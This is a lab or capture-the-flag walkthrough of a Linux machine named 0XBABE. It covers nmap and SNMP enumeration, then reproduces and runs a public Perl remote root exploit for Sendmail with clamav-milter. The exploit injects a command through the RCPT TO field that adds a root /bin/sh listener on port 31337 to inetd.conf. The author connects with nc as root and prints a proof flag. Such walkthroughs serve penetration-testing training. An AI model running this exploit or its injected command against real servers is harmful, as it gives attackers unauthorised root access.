Nmap
TCP Ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-24 05:41 +08
Nmap scan report for 192.168.179.42
Host is up (0.040s latency).
Not shown: 65529 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
139/tcp open netbios-ssn
199/tcp open smux
445/tcp open microsoft-ds
60000/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 6.81 seconds
Quite a number of ports found, so let’s take a deeper look.
TCP Service Scan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-24 05:41 +08
Nmap scan report for 192.168.179.42
Host is up (0.040s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)
| ssh-hostkey:
| 1024 30:3e:a4:13:5f:9a:32:c0:8e:46:eb:26:b3:5e:ee:6d (DSA)
|_ 1024 af:a2:49:3e:d8:f2:26:12:4a:a0:b5:ee:62:76:b0:18 (RSA)
25/tcp open smtp Sendmail 8.13.4/8.13.4/Debian-3sarge3
| smtp-commands: localhost.localdomain Hello [192.168.45.164], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, EXPN, VERB, 8BITMIME, SIZE, DSN, ETRN, DELIVERBY, HELP
|_ 2.0.0 This is sendmail version 8.13.4 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation send email to 2.0.0 [email protected]. 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
199/tcp open smux Linux SNMP multiplexer
445/tcp open netbios-ssn Samba smbd 3.0.14a-Debian (workgroup: WORKGROUP)
60000/tcp open ssh OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)
| ssh-hostkey:
| 1024 30:3e:a4:13:5f:9a:32:c0:8e:46:eb:26:b3:5e:ee:6d (DSA)
|_ 1024 af:a2:49:3e:d8:f2:26:12:4a:a0:b5:ee:62:76:b0:18 (RSA)
Service Info: Host: localhost.localdomain; OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Unix (Samba 3.0.14a-Debian)
| NetBIOS computer name:
| Workgroup: WORKGROUP\x00
|_ System time: 2024-11-23T21:42:04-05:00
|_nbstat: NetBIOS name: 0XBABE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_clock-skew: mean: 7h29m57s, deviation: 3h32m08s, median: 4h59m56s
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode:
| account_used: guest
| authentication_level: share (dangerous)
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.20 seconds
Port 25 seems interesting as it’s running Sendmail is able to receive some SMTP commands. SMB on ports 139 & 445 doesn’t give us much.
Port 199, however, suggests that there might be SNMP running and we can try scanning for UDP ports running SNMP as well. SNMP can sometimes give a lot of information.
UDP Ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-24 05:41 +08
Warning: 192.168.179.42 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.179.42
Host is up (0.045s latency).
Not shown: 65455 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)
PORT STATE SERVICE
137/udp open netbios-ns
161/udp open snmp
Nmap done: 1 IP address (1 host up) scanned in 73.07 seconds
Looks like SNMP is indeed running so let’s perform enumerate further with Nmap.
UDP Service Scan
We have quite a bit of information for the SNMP port 161.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-24 05:43 +08
Nmap scan report for 192.168.179.42
Host is up (0.040s latency).
PORT STATE SERVICE VERSION
137/udp open netbios-ns Samba nmbd netbios-ns (workgroup: WORKGROUP)
| nbns-interfaces:
| hostname: 0XBABE
| interfaces:
|_ 192.168.179.42
161/udp open snmp SNMPv1 server; U.C. Davis, ECE Dept. Tom SNMPv3 server (public)
| snmp-interfaces:
| lo
| IP address: 127.0.0.1 Netmask: 255.0.0.0
| Type: softwareLoopback Speed: 10 Mbps
| Traffic stats: 0.00 Kb sent, 0.00 Kb received
| eth0
| IP address: 192.168.179.42 Netmask: 255.255.255.0
| MAC address: 00:50:56🆎ff:3c (VMware)
| Type: ethernetCsmacd Speed: 100 Mbps
|_ Traffic stats: 3.99 Mb sent, 59.28 Mb received
| snmp-sysdescr: Linux 0xbabe.local 2.6.8-4-386 #1 Wed Feb 20 06:15:54 UTC 2008 i686
|_ System uptime: 1m44.36s (10436 timeticks)
| snmp-netstat:
| TCP 0.0.0.0:25 0.0.0.0:0
| TCP 0.0.0.0:80 0.0.0.0:0
| TCP 0.0.0.0:139 0.0.0.0:0
| TCP 0.0.0.0:199 0.0.0.0:0
| TCP 0.0.0.0:445 0.0.0.0:0
| UDP 0.0.0.0:137 *:*
| UDP 0.0.0.0:138 *:*
| UDP 0.0.0.0:161 *:*
| UDP 42.179.168.192:137 *:*
|_ UDP 42.179.168.192:138 *:*
| snmp-processes:
| 1:
| Name: init
| Path: init [2]
| 2:
| Name: ksoftirqd/0
| Path: ksoftirqd/0
| 3:
| Name: events/0
| Path: events/0
| 4:
| Name: khelper
| Path: khelper
| 5:
| Name: kacpid
| Path: kacpid
| 99:
| Name: kblockd/0
| Path: kblockd/0
| 109:
| Name: pdflush
| Path: pdflush
| 110:
| Name: pdflush
| Path: pdflush
| 111:
| Name: kswapd0
| Path: kswapd0
| 112:
| Name: aio/0
| Path: aio/0
| 255:
| Name: kseriod
| Path: kseriod
| 276:
| Name: scsi_eh_0
| Path: scsi_eh_0
| 284:
| Name: khubd
| Path: khubd
| 348:
| Name: shpchpd_event
| Path: shpchpd_event
| 380:
| Name: kjournald
| Path: kjournald
| 935:
| Name: vmmemctl
| Path: vmmemctl
| 1177:
| Name: vmtoolsd
| Path: /usr/sbin/vmtoolsd
| 3768:
| Name: syslogd
| Path: /sbin/syslogd
| 3771:
| Name: klogd
| Path: /sbin/klogd
| 3775:
| Name: clamd
| Path: /usr/local/sbin/clamd
| 3779:
| Name: clamav-milter
| Path: /usr/local/sbin/clamav-milter
| Params: --black-hole-mode -l -o -q /var/run/clamav/clamav-milter.ctl
| 3788:
| Name: inetd
| Path: /usr/sbin/inetd
| 3792:
| Name: nmbd
| Path: /usr/sbin/nmbd
| Params: -D
| 3794:
| Name: smbd
| Path: /usr/sbin/smbd
| Params: -D
| 3798:
| Name: snmpd
| Path: /usr/sbin/snmpd
| Params: -Lsd -Lf /dev/null -p /var/run/snmpd.pid
| 3800:
| Name: smbd
| Path: /usr/sbin/smbd
| Params: -D
| 3805:
| Name: sshd
| Path: /usr/sbin/sshd
| 3883:
| Name: sendmail-mta
| Path: sendmail: MTA: accepting connections
| 3902:
| Name: atd
| Path: /usr/sbin/atd
| 3905:
| Name: cron
| Path: /usr/sbin/cron
| 3912:
| Name: apache
| Path: /usr/sbin/apache
| 3928:
| Name: getty
| Path: /sbin/getty
| Params: 38400 tty1
| 3934:
| Name: getty
| Path: /sbin/getty
| Params: 38400 tty2
| 3935:
| Name: getty
| Path: /sbin/getty
| Params: 38400 tty3
| 3936:
| Name: getty
| Path: /sbin/getty
| Params: 38400 tty4
| 3937:
| Name: getty
| Path: /sbin/getty
| Params: 38400 tty5
| 3938:
| Name: getty
| Path: /sbin/getty
| Params: 38400 tty6
| 3962:
| Name: apache
| Path: /usr/sbin/apache
| 3963:
| Name: apache
| Path: /usr/sbin/apache
| 3964:
| Name: apache
| Path: /usr/sbin/apache
| 3965:
| Name: apache
| Path: /usr/sbin/apache
| 3966:
| Name: apache
|_ Path: /usr/sbin/apache
| snmp-info:
| enterprise: U.C. Davis, ECE Dept. Tom
| engineIDFormat: unknown
| engineIDData: 9e325869f30c7749
| snmpEngineBoots: 60
|_ snmpEngineTime: 1m44s
Service Info: Hosts: 0XBABE, 0xbabe.local
Host script results:
|_nbstat: NetBIOS name: 0XBABE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.34 seconds
UDP 161
A brief look at the Nmap service scan output of UDP port 161, we see a clamav-milter process running that looks interesting.
There’s also a sendmail-mta process accepting connections.
PORT STATE SERVICE VERSION
161/udp open snmp SNMPv1 server; U.C. Davis, ECE Dept. Tom SNMPv3 server (public)
| snmp-interfaces:
| lo
| IP address: 127.0.0.1 Netmask: 255.0.0.0
| Type: softwareLoopback Speed: 10 Mbps
| Traffic stats: 0.00 Kb sent, 0.00 Kb received
| eth0
| IP address: 192.168.179.42 Netmask: 255.255.255.0
| MAC address: 00:50:56🆎ff:3c (VMware)
| Type: ethernetCsmacd Speed: 100 Mbps
|_ Traffic stats: 3.99 Mb sent, 59.28 Mb received
| snmp-sysdescr: Linux 0xbabe.local 2.6.8-4-386 #1 Wed Feb 20 06:15:54 UTC 2008 i686
|_ System uptime: 1m44.36s (10436 timeticks)
| snmp-netstat:
| TCP 0.0.0.0:25 0.0.0.0:0
| TCP 0.0.0.0:80 0.0.0.0:0
| TCP 0.0.0.0:139 0.0.0.0:0
| TCP 0.0.0.0:199 0.0.0.0:0
| TCP 0.0.0.0:445 0.0.0.0:0
| UDP 0.0.0.0:137 *:*
| UDP 0.0.0.0:138 *:*
| UDP 0.0.0.0:161 *:*
| UDP 42.179.168.192:137 *:*
|_ UDP 42.179.168.192:138 *:*
| snmp-processes:
...<truncated>...
| 3775:
| Name: clamd
| Path: /usr/local/sbin/clamd
| 3779:
| Name: clamav-milter
| Path: /usr/local/sbin/clamav-milter
| Params: --black-hole-mode -l -o -q /var/run/clamav/clamav-milter.ctl
...<truncated>...
| 3883:
| Name: sendmail-mta
| Path: sendmail: MTA: accepting connections
...<truncated>...
clamav-milter
A quick Google search on clamav-milter.
There’s also an exploit in exploitdb:
https://www.exploit-db.com/exploits/4761
clamav-milter Exploit
### black-hole.pl
### Sendmail w/ clamav-milter Remote Root Exploit
### Copyright (c) 2007 Eliteboy
########################################################
use IO::Socket;
print "Sendmail w/ clamav-milter Remote Root Exploit\n";
print "Copyright (C) 2007 Eliteboy\n";
if ($#ARGV != 0) {print "Give me a host to connect.\n";exit;}
print "Attacking $ARGV[0]...\n";
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '25',
Proto => 'tcp');
print $sock "ehlo you\r\n";
print $sock "mail from: <>\r\n";
print $sock "rcpt to: <nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf\"@localhost>\r\n";
print $sock "rcpt to: <nobody+\"|/etc/init.d/inetd restart\"@localhost>\r\n";
print $sock "data\r\n.\r\nquit\r\n";
while (<$sock>) {
print;
}
# milw0rm.com [2007-12-21]
The exploit seems to leverage on Sendmail (which is also available on the target machine on port 25) to exploit an RCE by sending an email.
print $sock "rcpt to: <nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf\"@localhost>\r\n";
echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf
This particular one adds a line to /etc/inetd.conf to expose a /bin/sh shell on port 31337 as root.
We confirm that 31337 is closed before running the exploit.
nmap -p31337 192.168.179.42
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-24 05:56 +08
Nmap scan report for 192.168.179.42
Host is up (0.040s latency).
PORT STATE SERVICE
31337/tcp closed Elite
Nmap done: 1 IP address (1 host up) scanned in 0.16 seconds
Running the Exploit
perl black-hole.pl 192.168.179.42
Sendmail w/ clamav-milter Remote Root Exploit
Copyright (C) 2007 Eliteboy
Attacking 192.168.179.42...
220 localhost.localdomain ESMTP Sendmail 8.13.4/8.13.4/Debian-3sarge3; Sat, 23 Nov 2024 21:57:06 -0500; (No UCE/UBE) logging access from: [192.168.45.164](FAIL)-[192.168.45.164]
250-localhost.localdomain Hello [192.168.45.164], pleased to meet you
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-EXPN
250-VERB
250-8BITMIME
250-SIZE
250-DSN
250-ETRN
250-DELIVERBY
250 HELP
250 2.1.0 <>... Sender ok
250 2.1.5 <nobody+"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf">... Recipient ok
250 2.1.5 <nobody+"|/etc/init.d/inetd restart">... Recipient ok
354 Enter mail, end with "." on a line by itself
250 2.0.0 4AO2v6NO004068 Message accepted for delivery
221 2.0.0 localhost.localdomain closing connection
nmap -p31337 192.168.179.42
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-24 05:57 +08
Nmap scan report for 192.168.179.42
Host is up (0.040s latency).
PORT STATE SERVICE
31337/tcp open Elite
Nmap done: 1 IP address (1 host up) scanned in 0.14 seconds
After running the exploit, the port is open.
proof.txt
Connecting via nc we indeed get a root shell. Since we are already root, there would be no point in upgrading the shell. Additionally, there isn’t a local.txt in this machine as the home directory of the only user ryu does not have it.
rlwrap nc 192.168.179.42 31337
id
uid=0(root) gid=0(root) groups=0(root)
pwd
/
cd root
ls
dbootstrap_settings
install-report.template
proof.txt
cat proof.txt
8834dace65e1a28aa842490b7aff7e3f
cd /home
ls
ryu
cd ryu
ls -al
total 16
drwxr-xr-x 2 1000 1000 4096 Jan 19 2009 .
drwxrwsr-x 3 root staff 4096 Jan 19 2009 ..
-rw-r--r-- 1 1000 1000 567 Jan 19 2009 .bash_profile
-rw-r--r-- 1 1000 1000 1834 Jan 19 2009 .bashrc